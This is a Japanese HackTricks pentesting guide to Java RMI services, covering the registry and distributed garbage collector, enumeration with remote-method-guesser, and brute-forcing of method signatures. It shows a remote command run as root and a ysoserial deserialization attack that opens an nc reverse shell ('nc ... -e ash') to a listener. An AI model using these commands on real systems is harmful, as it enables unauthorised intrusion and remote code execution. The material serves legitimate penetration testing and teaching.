hacktricks/network-services-pentesting/1099-pentesting-java-rmi.md

1098/1099/1050 - Java RMIのペンテスト - RMI-IIOP

**htARTE（HackTricks AWS Red Team Expert）**で**ゼロからヒーローまでのAWSハッキング**を学びましょう！

HackTricksをサポートする他の方法：

• HackTricksで企業を宣伝したい場合やHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksのグッズを入手する
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
• 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。

Trickestを使用して、世界で最も高度なコミュニティツールによってパワードされたワークフローを簡単に構築および自動化します。
今すぐアクセスしてください：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

基本情報

Java Remote Method Invocation、または_Java RMI_は、オブジェクト指向の_RPC_メカニズムであり、1つの_Java仮想マシン_にあるオブジェクトが別の_Java仮想マシンにあるオブジェクトのメソッドを呼び出すことを可能にします。これにより、開発者はオブジェクト指向パラダイムを使用して分散アプリケーションを記述できます。攻撃的な観点からの_Java RMI_の簡単な紹介は、このブラックハットのトークで見つけることができます。

デフォルトポート: 1090、1098、1099、1199、4443-4446、8999-9010、9999

PORT      STATE SERVICE      VERSION
1090/tcp  open  ssl/java-rmi Java RMI
9010/tcp  open  java-rmi     Java RMI
37471/tcp open  java-rmi     Java RMI
40259/tcp open  ssl/java-rmi Java RMI

通常、一般的なポートにはデフォルトの_Java RMI_コンポーネント（RMI Registry_と_Activation System）のみがバインドされます。実際の_RMI_アプリケーションを実装する_リモートオブジェクト_は、通常、ランダムなポートにバインドされます（上記の出力に示されているように）。

_nmap_は、時々_SSL_で保護された_RMI_サービスを識別するのに苦労することがあります。一般的な_RMI_ポートで不明なsslサービスに遭遇した場合は、さらに調査する必要があります。

RMIコンポーネント

簡単に言うと、_Java RMI_は開発者がネットワーク上で_Javaオブジェクト_を利用可能にすることを可能にします。これにより、クライアントが接続して対応するオブジェクトのメソッドを呼び出すことができる_TCP_ポートが開かれます。これは単純なように聞こえますが、_Java RMI_が解決する必要があるいくつかの課題があります：

1. _Java RMI_を介してメソッド呼び出しをディスパッチするには、クライアントがIPアドレス、リスニングポート、実装されたクラスまたはインターフェース、および対象オブジェクトのObjID（ObjIDはオブジェクトがネットワーク上で利用可能になるときに作成される一意のランダムな識別子です。_Java RMI_は複数のオブジェクトが同じ_TCP_ポートでリッスンすることを許可しているため、これが必要です）を知っている必要があります。
2. リモートクライアントは、公開されたオブジェクトのメソッドを呼び出すことでサーバー上でリソースを割り当てる場合があります。_Java仮想マシン_は、これらのリソースのうちどれがまだ使用中であり、どれがガベージコレクションされる可能性があるかを追跡する必要があります。

最初の課題は_RMIレジストリ_によって解決されます。これは基本的に_Java RMI_のための名前付けサービスです。_RMIレジストリ_自体も_RMIサービス_ですが、実装されたインターフェースとObjIDは固定されており、すべての_RMI_クライアントによって知られています。これにより、_RMI_クライアントは対応する_TCP_ポートを知っているだけで_RMIレジストリ_を利用できます。

開発者がネットワーク内で_Javaオブジェクト_を利用可能にしたい場合、通常はそれらを_RMIレジストリ_にバインドします。_レジストリ_は、オブジェクトに接続するために必要なすべての情報（IPアドレス、リスニングポート、実装されたクラスまたはインターフェース、およびObjID値）を保存し、人間が読める名前（バウンド名）の下で利用可能にします。_RMIサービス_を消費したいクライアントは、_RMIレジストリ_に対応する_バウンド名_を問い合わせ、レジストリは接続に必要なすべての情報を返します。したがって、状況は基本的に通常の_DNS_サービスと同じです。次のリストは小さな例を示しています：

import java.rmi.registry.Registry;
import java.rmi.registry.LocateRegistry;
import lab.example.rmi.interfaces.RemoteService;

public class ExampleClient {

private static final String remoteHost = "172.17.0.2";
private static final String boundName = "remote-service";

public static void main(String[] args)
{
try {
Registry registry = LocateRegistry.getRegistry(remoteHost);     // Connect to the RMI registry
RemoteService ref = (RemoteService)registry.lookup(boundName);  // Lookup the desired bound name
String response = ref.remoteMethod();                           // Call a remote method

} catch( Exception e) {
e.printStackTrace();
}
}
}

上記の課題の2つ目は、分散ガベージコレクター（DGC）によって解決されます。これは別のRMIサービスであり、よく知られたObjID値を持ち、基本的に各RMIエンドポイントで利用可能です。RMIクライアントがRMIサービスを使用し始めると、対応するリモートオブジェクトが使用中であることをDGCに情報を送信します。DGCはその後、参照カウントを追跡し、未使用のオブジェクトをクリーンアップすることができます。

非推奨のActivation Systemと共に、これらはJava RMIの3つのデフォルトコンポーネントです：

1. RMIレジストリ（ObjID = 0）
2. Activation System（ObjID = 1）
3. Distributed Garbage Collector（ObjID = 2）

Java RMIのデフォルトコンポーネントはかなり長い間既知の攻撃ベクトルであり、古いJavaバージョンには複数の脆弱性が存在しています。攻撃者の視点から見ると、これらのデフォルトコンポーネントは興味深いものであり、既知のクラス/インターフェースが実装されており、それらと簡単にやり取りすることが可能です。これはカスタムRMIサービスに対しては異なります。リモートオブジェクトのメソッドを呼び出すには、事前に対応するメソッドシグネチャを知っている必要があります。既存のメソッドシグネチャを知らない場合、RMIサービスに通信する方法はありません。

RMI列挙

remote-method-guesserは、一般的なRMI脆弱性を自動的に特定できるJava RMI脆弱性スキャナーです。RMIエンドポイントを特定した場合は、試してみる価値があります。

$ rmg enum 172.17.0.2 9010
[+] RMI registry bound names:
[+]
[+] 	- plain-server2
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff7, 3638117546492248534]
[+] 	- legacy-service
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ffc, 708796783031663206]
[+] 	- plain-server
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer (unknown class)
[+] 		    Endpoint: iinsecure.dev:37471  TLS: no  ObjID: [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] RMI server codebase enumeration:
[+]
[+] 	- http://iinsecure.dev/well-hidden-development-folder/
[+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
[+] 		--> de.qtc.rmg.server.interfaces.IPlainServer
[+]
[+] RMI server String unmarshalling enumeration:
[+]
[+] 	- Caught ClassNotFoundException during lookup call.
[+] 	  --> The type java.lang.String is unmarshalled via readObject().
[+] 	  Configuration Status: Outdated
[+]
[+] RMI server useCodebaseOnly enumeration:
[+]
[+] 	- Caught MalformedURLException during lookup call.
[+] 	  --> The server attempted to parse the provided codebase (useCodebaseOnly=false).
[+] 	  Configuration Status: Non Default
[+]
[+] RMI registry localhost bypass enumeration (CVE-2019-2684):
[+]
[+] 	- Caught NotBoundException during unbind call (unbind was accepeted).
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] RMI Security Manager enumeration:
[+]
[+] 	- Security Manager rejected access to the class loader.
[+] 	  --> The server does use a Security Manager.
[+] 	  Configuration Status: Current Default
[+]
[+] RMI server JEP290 enumeration:
[+]
[+] 	- DGC rejected deserialization of java.util.HashMap (JEP290 is installed).
[+] 	  Vulnerability Status: Non Vulnerable
[+]
[+] RMI registry JEP290 bypass enmeration:
[+]
[+] 	- Caught IllegalArgumentException after sending An Trinh gadget.
[+] 	  Vulnerability Status: Vulnerable
[+]
[+] RMI ActivationSystem enumeration:
[+]
[+] 	- Caught IllegalArgumentException during activate call (activator is present).
[+] 	  --> Deserialization allowed	 - Vulnerability Status: Vulnerable
[+] 	  --> Client codebase enabled	 - Configuration Status: Non Default

The output of the enumeration action is explained in more detail in the documentation pages of the project. Depending on the outcome, you should try to verify identified vulnerabilities.

The ObjID values displayed by remote-method-guesser can be used to determine the uptime of the service. This may allows to identify other vulnerabilities:

$ rmg objid '[55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]'
[+] Details for ObjID [55ff5a5d:17e0501b054:-7ff8, -4004948013687638236]
[+]
[+] ObjNum: 		-4004948013687638236
[+] UID:
[+] 	Unique: 	1442798173
[+] 	Time: 		1640761503828 (Dec 29,2021 08:05)
[+] 	Count: 		-32760

リモートメソッドのブルートフォース

列挙中に脆弱性が特定されなかった場合でも、利用可能な RMI サービスは危険な機能を公開している可能性があります。さらに、RMI デフォルトコンポーネントへの RMI 通信は逆シリアル化フィルターによって保護されていますが、カスタム RMI サービスと通信する際には、そのようなフィルターが通常存在しません。したがって、RMI サービス上の有効なメソッドシグネチャを知ることは有益です。

残念ながら、Java RMI は リモートオブジェクト 上のメソッドを列挙することをサポートしていません。ただし、remote-method-guesser や rmiscout などのツールを使用してメソッドシグネチャをブルートフォースすることが可能です。

$ rmg guess 172.17.0.2 9010
[+] Reading method candidates from internal wordlist rmg.txt
[+] 	752 methods were successfully parsed.
[+] Reading method candidates from internal wordlist rmiscout.txt
[+] 	2550 methods were successfully parsed.
[+]
[+] Starting Method Guessing on 3281 method signature(s).
[+]
[+] 	MethodGuesser is running:
[+] 		--------------------------------
[+] 		[ plain-server2  ] HIT! Method with signature String execute(String dummy) exists!
[+] 		[ plain-server2  ] HIT! Method with signature String system(String dummy, String[] dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void logMessage(int dummy1, String dummy2) exists!
[+] 		[ legacy-service ] HIT! Method with signature void releaseRecord(int recordID, String tableName, Integer remoteHashCode) exists!
[+] 		[ legacy-service ] HIT! Method with signature String login(java.util.HashMap dummy1) exists!
[+] 		[6562 / 6562] [#####################################] 100%
[+] 	done.
[+]
[+] Listing successfully guessed methods:
[+]
[+] 	- plain-server2 == plain-server
[+] 		--> String execute(String dummy)
[+] 		--> String system(String dummy, String[] dummy2)
[+] 	- legacy-service
[+] 		--> void logMessage(int dummy1, String dummy2)
[+] 		--> void releaseRecord(int recordID, String tableName, Integer remoteHashCode)
[+] 		--> String login(java.util.HashMap dummy1)

特定されたメソッドは次のように呼び出すことができます：

$ rmg call 172.17.0.2 9010 '"id"' --bound-name plain-server --signature "String execute(String dummy)" --plugin GenericPrint.jar
[+] uid=0(root) gid=0(root) groups=0(root)

または、次のようにデシリアライゼーション攻撃を実行することができます：

$ rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"
[+] Creating ysoserial payload... done.
[+]
[+] Attempting deserialization attack on RMI endpoint...
[+]
[+] 	Using non primitive argument type java.lang.String on position 0
[+] 	Specified method signature is String execute(String dummy)
[+]
[+] 	Caught ClassNotFoundException during deserialization attack.
[+] 	Server attempted to deserialize canary class 6ac727def61a4800a09987c24352d7ea.
[+] 	Deserialization attack probably worked :)

$ nc -vlp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:45479.
id
uid=0(root) gid=0(root) groups=0(root)

以下の記事に詳細情報があります：

• Attacking Java RMI services after JEP 290
• Method Guessing
• remote-method-guesser
• rmiscout

推測以外にも、RMI サービスのインターフェースや実装を見つけるために検索エンジンや GitHub を調べるべきです。ここで、bound name と実装されたクラスやインターフェースの名前が役立つことがあります。

既知のインターフェース

remote-method-guesser は、ツールの内部データベースにリストされている RMI サービス の既知のクラスやインターフェースを known としてマークします。これらの場合、対応する RMI サービス についてさらに情報を取得するために known アクションを使用できます。

$ rmg enum 172.17.0.2 1090 | head -n 5
[+] RMI registry bound names:
[+]
[+] 	- jmxrmi
[+] 		--> javax.management.remote.rmi.RMIServerImpl_Stub (known class: JMX Server)
[+] 		    Endpoint: localhost:41695  TLS: no  ObjID: [7e384a4f:17e0546f16f:-7ffe, -553451807350957585]

$ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
[+] Name:
[+] 	JMX Server
[+]
[+] Class Name:
[+] 	- javax.management.remote.rmi.RMIServerImpl_Stub
[+] 	- javax.management.remote.rmi.RMIServer
[+]
[+] Description:
[+] 	Java Management Extensions (JMX) can be used to monitor and manage a running Java virtual machine.
[+] 	This remote object is the entrypoint for initiating a JMX connection. Clients call the newClient
[+] 	method usually passing a HashMap that contains connection options (e.g. credentials). The return
[+] 	value (RMIConnection object) is another remote object that is when used to perform JMX related
[+] 	actions. JMX uses the randomly assigned ObjID of the RMIConnection object as a session id.
[+]
[+] Remote Methods:
[+] 	- String getVersion()
[+] 	- javax.management.remote.rmi.RMIConnection newClient(Object params)
[+]
[+] References:
[+] 	- https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
[+] 	- https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
[+]
[+] Vulnerabilities:
[+]
[+] 	-----------------------------------
[+] 	Name:
[+] 		MLet
[+]
[+] 	Description:
[+] 		MLet is the name of an MBean that is usually available on JMX servers. It can be used to load
[+] 		other MBeans dynamically from user specified codebase locations (URLs). Access to the MLet MBean
[+] 		is therefore most of the time equivalent to remote code execution.
[+]
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter
[+]
[+] 	-----------------------------------
[+] 	Name:
[+] 		Deserialization
[+]
[+] 	Description:
[+] 		Before CVE-2016-3427 got resolved, JMX accepted arbitrary objects during a call to the newClient
[+] 		method, resulting in insecure deserialization of untrusted objects. Despite being fixed, the
[+] 		actual JMX communication using the RMIConnection object is not filtered. Therefore, if you can
[+] 		establish a working JMX connection, you can also perform deserialization attacks.
[+]
[+] 	References:
[+] 		- https://github.com/qtc-de/beanshooter

Shodan

• port:1099 java

ツール

• remote-method-guesser
• rmiscout
• BaRMIe

参考文献

• https://github.com/qtc-de/remote-method-guesser

HackTricks 自動コマンド

Protocol_Name: Java RMI                                        #Protocol Abbreviation if there is one.
Port_Number:  1090,1098,1099,1199,4443-4446,8999-9010,9999     #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Invocation            #Protocol Abbreviation Spelled out

Entry_1:
Name: Enumeration
Description: Perform basic enumeration of an RMI service
Command: rmg enum {IP} {PORT}

Trickestを使用して、世界で最も先進的なコミュニティツールによって強化されたワークフローを簡単に構築および自動化します。
今すぐアクセスしてください：

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

htARTE (HackTricks AWS Red Team Expert)で**ゼロからヒーローまでのAWSハッキング**を学びましょう！

HackTricksをサポートする他の方法：

• HackTricksで企業を宣伝したい場合やHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください！
• 公式PEASS＆HackTricksのグッズを入手してください
• The PEASS Familyを発見し、独占的なNFTsのコレクションを見つけてください
• 💬 Discordグループやtelegramグループに参加したり、Twitter 🐦 @carlospolopmをフォローしてください。
• HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。